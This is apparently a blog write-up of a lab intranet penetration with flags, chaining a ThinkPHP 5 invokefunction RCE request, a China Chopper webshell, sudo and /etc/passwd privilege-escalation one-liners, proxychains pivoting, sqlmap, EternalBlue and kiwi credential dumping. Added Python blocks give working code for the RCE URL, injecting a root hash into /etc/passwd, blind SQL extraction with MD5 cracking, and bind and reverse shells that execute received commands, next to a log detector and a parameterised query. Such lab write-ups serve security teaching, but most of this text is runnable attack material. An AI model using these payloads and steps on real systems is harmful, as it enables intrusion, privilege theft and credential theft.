A successful intranet penetration

Virtual network card configuration

Environment issues:

  1. The VM bridge adapter could not obtain an IP address; fixed by restoring the default settings and binding the bridge to the physical NIC explicitly.

  2. On target machine 1 the internal NIC could not obtain an IP address; fixed by adding an interface configuration file.

Starting the penetration:

Attack machine: 192.168.1.13

CentOS 7 (target 1, dual-homed): 192.168.1.16 (external) / 192.168.22.11 (internal)

Port scan

Scan the ports and run the nmap vulnerability scripts:

nmap -sS -A 192.168.101.91 --script=vuln

(The address in the command is as recorded in the original post; the target address listed above is 192.168.1.16.) The scan is slow, so no screenshots.

Visit port 80

Tested for the BT Panel (Baota, "pagoda") unauthenticated-access issue: not present.

Checked robots.txt and found flag1.

Searching Baidu for ThinkPHP v5 vulnerabilities turns up the remote code execution bug (the 5.0.x invokefunction route, which lets a single GET request call an arbitrary PHP function through call_user_func_array):

https://www.cnblogs.com/backlion/p/10106676.html

http://192.168.1.16/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

Replacing phpinfo with system and passing a shell command in vars[1][] gives command execution; flag2 was found this way.

Write a one-sentence webshell (一句话木马):

flag3 was found while using command execution to look for a writable path for the webshell.

Switched to a different payload to write the one-sentence webshell shy.php; the earlier write had succeeded, but its path could not be found.

Connect to it with China Chopper (菜刀).
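As an added example (not code from the original post, nor ThinkPHP's own), the request above built programmatically, together with the defensive counterpart: a scan of web-server access logs for the same route. The log lines and the 192.168.1.20 client in them are constructed for the example; the attacker address 192.168.1.13 is the post's attack machine.

```python
import re
from urllib.parse import urlencode, unquote

# Added example, not from the original post: the ThinkPHP 5.0.x invokefunction
# request used above, built programmatically, plus the detection side: a scan
# of web-server access logs for the same route. The log lines are constructed
# for this example; the attacker IP 192.168.1.13 is the post's attack machine.

THINK_RCE_ROUTE = r"index/\think\app/invokefunction"


def build_invokefunction_url(base: str, func: str, *args: str) -> str:
    """GET URL that makes ThinkPHP run func(*args) via call_user_func_array.
    build_invokefunction_url(base, "phpinfo", "1") is the post's payload;
    ("system", "id") runs a shell command instead."""
    params = [("s", THINK_RCE_ROUTE), ("function", "call_user_func_array"),
              ("vars[0]", func)] + [("vars[1][]", a) for a in args]
    # keep '/', '[' and ']' literal so the URL reads like the usual write-ups
    return f"{base.rstrip('/')}/index.php?{urlencode(params, safe='/[]')}"


# Combined-log-format prefix: client IP, identity, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# The route itself plus the PHP callback helpers the exploit chain relies on.
RCE_MARKERS = re.compile(r"\\think\\|invokefunction|call_user_func", re.IGNORECASE)


def is_thinkphp_rce_request(target: str) -> bool:
    """Decode the request target twice (attackers double-encode the
    backslashes as %255C) before matching."""
    return bool(RCE_MARKERS.search(unquote(unquote(target))))


def flag_rce_in_log(lines):
    """(client IP, decoded request target) for each line that looks like an
    invokefunction attempt; lines that do not parse are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_thinkphp_rce_request(m.group("target")):
            hits.append((m.group("ip"), unquote(unquote(m.group("target")))))
    return hits


SAMPLE_LOG = [  # constructed sample lines
    '192.168.1.13 - - [10/Oct/2020:12:00:01 +0800] "GET /robots.txt HTTP/1.1" 200 45',
    '192.168.1.13 - - [10/Oct/2020:12:00:09 +0800] "GET /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 87234',
    '192.168.1.13 - - [10/Oct/2020:12:00:31 +0800] "GET /index.php?s=index/%255Cthink%255Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 200 120',
    '192.168.1.20 - - [10/Oct/2020:12:01:00 +0800] "GET /index.php?s=index/index/index HTTP/1.1" 200 2300',
]

if __name__ == "__main__":
    print(build_invokefunction_url("http://192.168.1.16", "system", "id"))
    for ip, target in flag_rce_in_log(SAMPLE_LOG):
        print(f"ALERT {ip} {target}")
```

The detector decodes twice on purpose: the third sample line hides the backslashes as %255C, which a single decode leaves as %5C and a naive substring match on "\think\" misses.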

Information gathering:

1. uname -a

Linux 3.10.0-1062.1.1.el7.x86_64 x86_64

Reading the kernel release 3.10.0-1062.1.1.el7: 3 is the kernel version, 10 the major revision, 0 the minor revision, and 1062.1.1.el7 is the distribution build (patch level). On CentOS it is this build number, not just 3.10.0, that decides which kernel exploits still apply, because Red Hat backports fixes.

2. hostnamectl

CentOS 7, x86_64

Based on the collected information, generate a matching (Linux x86_64) payload with msf.

Upload the generated binary with Chopper.

Make it executable from Chopper and run it.

msf receives the shell.

python -c 'import pty; pty.spawn("/bin/bash")' to upgrade it to an interactive TTY.

Attempt SUID privilege escalation:

find / -user root -perm -4000 -print 2>/dev/null

Check whether /etc/passwd or /etc/shadow is writable.

How this is abused: replace the x in root's password field in /etc/passwd with a hash you generated yourself (for example on your own Linux box). Login then uses that hash directly and never consults /etc/shadow, so root's password becomes the one you chose.

Check whether /etc/shadow is readable; if it is, the hashes can be cracked offline.

Sudo abuse? The problem is that I don't even know the www user's password. Can I change my own password? I just tested it.

sudo lets an ordinary user run commands as the superuser. Its configuration file is /etc/sudoers, which defines which accounts may use sudo, which commands they may run as root, and whether a password is required.

Check which commands can be run through sudo (sudo -l). This does not need the root password, but it normally does need the ordinary user's own password. If any allowed command can spawn a shell or read arbitrary files, that alone is enough:

sudo awk 'BEGIN {system("/bin/sh")}'

sudo man man

sudo curl file:///etc/shadow

https://gtfobins.github.io/

Check scheduled tasks (cron): nothing there either.
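The manual checks from this section (reading the kernel release, SUID binaries, writable /etc/passwd, readable /etc/shadow, sudo rights) as one added example script; this is not the post's own tooling. The scratch directory it builds is a constructed fixture so the checks can be exercised without touching the real /etc, and the passwd text in the usage is a made-up sample, not the target's.

```python
import os
import re
import stat
import subprocess
import tempfile
from typing import Dict, List

# Added example, not the post's own code: the local privilege-escalation
# triage the writeup does by hand (kernel version, SUID binaries, /etc/passwd
# and /etc/shadow permissions, sudo rights) as reusable functions. Path
# arguments exist so the checks can be run against scratch files as well as
# the real /etc.

KERNEL_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-(\S+))?$")


def parse_kernel_release(release: str) -> Dict[str, str]:
    """Split 'uname -r' output, e.g. 3.10.0-1062.1.1.el7.x86_64, into the
    upstream version.major.minor and the distro build suffix. On CentOS the
    suffix matters: Red Hat backports fixes, so '3.10.0' alone says little
    about which kernel exploits still apply."""
    m = KERNEL_RE.match(release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    version, major, minor, build = m.groups()
    return {"version": version, "major": major, "minor": minor,
            "upstream": f"{version}.{major}.{minor}", "build": build or ""}


def classify_file(path: str) -> List[str]:
    """The permission questions asked in the writeup, for one path."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["missing"]
    flags = []
    if st.st_mode & stat.S_ISUID:
        flags.append("suid-root" if st.st_uid == 0 else "suid")
    if st.st_mode & stat.S_IWOTH:
        flags.append("world-writable")   # passwd writable -> own root
    if st.st_mode & stat.S_IROTH:
        flags.append("world-readable")   # shadow readable -> crack offline
    return flags or ["none"]


def find_suid(root: str = "/", root_owned_only: bool = True) -> List[str]:
    """Equivalent of: find / -user root -perm -4000 -print 2>/dev/null"""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID
                    and (st.st_uid == 0 or not root_owned_only)):
                hits.append(p)
    return sorted(hits)


def inject_root_hash(passwd_text: str, crypt_hash: str) -> str:
    """If /etc/passwd is writable: put a hash we control in root's password
    field instead of 'x'. Login then checks that hash and never consults
    /etc/shadow, so root's password becomes the one we hashed."""
    out = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) == 7 and f[0] == "root" and f[1] == "x":
            f[1] = crypt_hash
        out.append(":".join(f))
    return "\n".join(out) + "\n"


def sudo_rights() -> str:
    """'sudo -n -l' lists what this user may run as root without prompting;
    check every entry against https://gtfobins.github.io/."""
    try:
        r = subprocess.run(["sudo", "-n", "-l"], capture_output=True,
                           text=True, timeout=10)
    except (FileNotFoundError, subprocess.TimeoutExpired) as exc:
        return f"sudo unavailable: {exc}"
    return r.stdout or r.stderr


def make_scratch_dir() -> str:
    """Constructed fixture: a fake /etc covering the four cases above."""
    d = tempfile.mkdtemp()
    for name, mode in (("passwd", 0o666), ("shadow", 0o644),
                       ("ping", 0o4755), ("plain", 0o600)):
        p = os.path.join(d, name)
        open(p, "w").close()
        os.chmod(p, mode)
    return d


if __name__ == "__main__":
    print(parse_kernel_release(os.uname().release))
    print({p: classify_file(p) for p in ("/etc/passwd", "/etc/shadow")})
    print(sudo_rights())
```

Run as the www user on the target, the __main__ block answers the three questions in order; the scratch directory exists only so the classifier can be checked on a box you own first (the sample passwd text used for inject_root_hash is likewise made up).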

Kernel exploits (e.g. a kernel stack overflow) are the remaining privilege-escalation option.

Decided to skip privilege escalation and move straight to the intranet pivot.

Check the interfaces: there is an address in the 192.168.22.0/24 segment.

Add a route to that segment through the meterpreter session.

Set up a proxy (SOCKS, used with proxychains below).

Test the proxy: hosts in the 22 segment cannot be pinged from the attack machine (it has no route to that segment), but they can be reached through the proxy, so the proxy is working.

Scan the 22 segment through the proxy with nmap; host 192.168.22.22 is alive. (Through a SOCKS proxy only a TCP connect scan with host discovery disabled goes through; SYN scans and ICMP pings are not proxied.)

Run a detailed nmap scan of 22.22.

Port 80 is open; configure Firefox to use the proxy.

Visit port 80.

A hint is found in the page source.

Run sqlmap through the proxy:

proxychains sqlmap -u "192.168.22.22/index.php?r=vul&keyword=1" -p keyword

Dump the databases (--dbs).

Dump the tables (--tables).

Dump the columns (--columns).

Crack the password hash.
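What sqlmap is doing behind the dump and crack steps above, reduced to a boolean-based blind injection against an in-memory SQLite stand-in. This is an added example, not the post's code and not the target's real schema: the tags and users tables, the rows, and the admin password are constructed here, and the vulnerable handler mimics the keyword parameter being spliced into SQL.

```python
import hashlib
import sqlite3
from typing import Callable, Iterable, Optional

# Added example, not from the writeup: what sqlmap is doing behind the
# "dump databases / tables / columns / crack" steps, reduced to a boolean-
# based blind injection against an in-memory SQLite copy of the target's
# situation. The schema, rows and the admin password are constructed here.

ADMIN_PASSWORD = "Passw0rd!"
ADMIN_HASH = hashlib.md5(ADMIN_PASSWORD.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE tags  (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO tags (name) VALUES ('linux'), ('thinkphp'), ('cms');
    """)
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 ("admin", ADMIN_HASH))
    return conn


def vulnerable_search(conn, keyword: str):
    """The index.php?r=vul&keyword=... handler as the scanner sees it:
    the parameter is spliced into the SQL text."""
    return conn.execute(f"SELECT id, name FROM tags WHERE name = '{keyword}'").fetchall()


def safe_search(conn, keyword: str):
    """Same query with a bound parameter; the payloads below return nothing."""
    return conn.execute("SELECT id, name FROM tags WHERE name = ?", (keyword,)).fetchall()


class BlindOracle:
    """Turns the vulnerable endpoint into a yes/no oracle: rows come back
    only when the injected condition is true (no tag has an empty name)."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def ask(self, condition: str) -> bool:
        self.requests += 1
        return len(vulnerable_search(self.conn, f"' OR ({condition}) -- ")) > 0


def binary_search(greater_than: Callable[[int], bool], lo: int, hi: int) -> int:
    """The hidden integer in [lo, hi], found with ~log2(hi - lo) oracle
    queries of the form 'value > n'."""
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_admin_hash(oracle: BlindOracle) -> str:
    """Recover users.password for admin one character at a time: first its
    length, then each character's code point via substr()/unicode()."""
    sub = "(SELECT password FROM users WHERE username = 'admin')"
    length = binary_search(lambda n: oracle.ask(f"length({sub}) > {n}"), 0, 128)
    chars = []
    for i in range(1, length + 1):
        code = binary_search(
            lambda n, i=i: oracle.ask(f"unicode(substr({sub}, {i}, 1)) > {n}"), 0, 127)
        chars.append(chr(code))
    return "".join(chars)


def crack_md5(digest: str, wordlist: Iterable[str]) -> Optional[str]:
    """The 'crack the password' step: an unsalted md5 falls to a wordlist."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


WORDLIST = ["123456", "admin", "password", "Passw0rd!", "letmein"]  # constructed

if __name__ == "__main__":
    oracle = BlindOracle(build_db())
    digest = extract_admin_hash(oracle)
    print(digest, "in", oracle.requests, "requests ->", crack_md5(digest, WORDLIST))
```

A 32-character md5 costs about 230 requests with the binary search, which is why sqlmap's blind techniques are noisy in the web log and why the backend dump takes minutes even over the proxy. The safe_search variant shows the fix: the same payloads become an ordinary (non-matching) string.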

robots.txt reveals the admin backend path.

Log in to the backend with the cracked credentials and find the flag.

Then I was stuck in the backend for a long time: there were too many features to try (file upload, database backup, database command execution, ...). It took a long time.

Modify a template from the backend management (this is where I got stuck for a long time: creating a new template file or editing other files did not work; the change has to go into the index template, which is then executed automatically).

Inject phpinfo() through the template and browse to it to get the web root:

http://192.168.22.22/index.php?r=tag

Configure the proxy on the physical host, because Chopper cannot be used on Kali.

Use a proxy client there.

Connect with Chopper.

From the Chopper virtual terminal it turns out there is also a 192.168.33.0/24 segment.

Information gathering: Ubuntu, x86.

Generate the backdoor with msf. This server is inside the intranet, not a border host, and cannot reach our attack machine, so a reverse_tcp payload (the victim connecting back to us) is not an option; only bind_tcp (forward connection) works: the payload opens a listening port on the server and msf connects to it through the route added earlier. The port is fixed when the backdoor is generated.
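The bind_tcp versus reverse_tcp distinction just described, as an added example with plain sockets (not the post's code and not msf's): both directions are played out on 127.0.0.1, with one thread standing in for the 22.22 host and the main thread for the attacker. The victim side really runs the command it receives through /bin/sh, so the inputs are the constructed echo commands only.

```python
import socket
import subprocess
import threading

# Added example, not the post's own code: bind_tcp versus reverse_tcp modelled
# with plain sockets on 127.0.0.1. "victim" plays the 22.22 host and
# "attacker" the msf box; the victim really runs the command it receives
# through /bin/sh, so only send it constructed input such as "echo test".


def _serve_one_command(conn: socket.socket) -> None:
    """Victim side of a one-shot shell: read a line, run it, send the output."""
    with conn:
        f = conn.makefile("rb")
        cmd = f.readline().decode().strip()
        f.close()
        res = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        conn.sendall((res.stdout + res.stderr).encode())


def _recv_until_closed(sock: socket.socket) -> str:
    chunks = []
    while True:
        data = sock.recv(4096)
        if not data:
            return b"".join(chunks).decode()
        chunks.append(data)


def bind_shell_demo(cmd: str) -> str:
    """bind_tcp: the payload LISTENS on the victim and the attacker connects
    in. The port is chosen when the payload is generated (LPORT), so the
    handler must use the same one. This works for 22.22 because msf can route
    to it (autoroute / socks), even though 22.22 cannot reach the attacker."""
    victim = socket.socket()
    victim.bind(("127.0.0.1", 0))   # 0 = any free port; stands in for LPORT
    victim.listen(1)
    port = victim.getsockname()[1]

    def victim_side():
        conn, _ = victim.accept()
        victim.close()
        _serve_one_command(conn)

    t = threading.Thread(target=victim_side)
    t.start()
    with socket.create_connection(("127.0.0.1", port)) as attacker:  # forward connection
        attacker.sendall(cmd.encode() + b"\n")
        out = _recv_until_closed(attacker)
    t.join()
    return out


def reverse_shell_demo(cmd: str) -> str:
    """reverse_tcp: the attacker's handler listens and the payload connects
    OUT to it. This needs a path from victim to attacker, which the border
    host 192.168.1.16 has but the inner 22.22 host does not."""
    handler = socket.socket()
    handler.bind(("127.0.0.1", 0))
    handler.listen(1)
    port = handler.getsockname()[1]

    def victim_side():
        conn = socket.create_connection(("127.0.0.1", port))  # the call-back
        _serve_one_command(conn)

    t = threading.Thread(target=victim_side)
    t.start()
    conn, _ = handler.accept()
    handler.close()
    with conn:
        conn.sendall(cmd.encode() + b"\n")
        out = _recv_until_closed(conn)
    t.join()
    return out


if __name__ == "__main__":
    print("bind:   ", bind_shell_demo("echo via-bind").strip())
    print("reverse:", reverse_shell_demo("echo via-reverse").strip())
```

On localhost both demos succeed; on the real network only the bind variant can, because in the reverse case the victim_side connect has to reach the attacker's address, and from 22.22 that packet has nowhere to go. The flip side of bind_tcp is that the listening port is visible to anyone on the 22 segment until the handler connects.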

Generate it.

Upload it to the 22.22 machine with Chopper.

Configure the msf handler (note: the port must be the same one used when generating the payload).

Run it from Chopper; msf gets the shell.

Confirm the 33 segment is reachable from this host.

Add a route to it.

Scan for live hosts by probing a few specific ports; intranet host 192.168.33.33 is alive.

Scan 33.33's open ports individually.

Port 445 is open: use the msf ms17_010 (EternalBlue) module directly.

load kiwi        load the kiwi (mimikatz) extension

help kiwi        show its commands

creds_all        dump all credentials

Create a new user with the recovered credentials.

Logged in successfully.

 


Source: blog.csdn.net/qq_32393893/article/details/108973899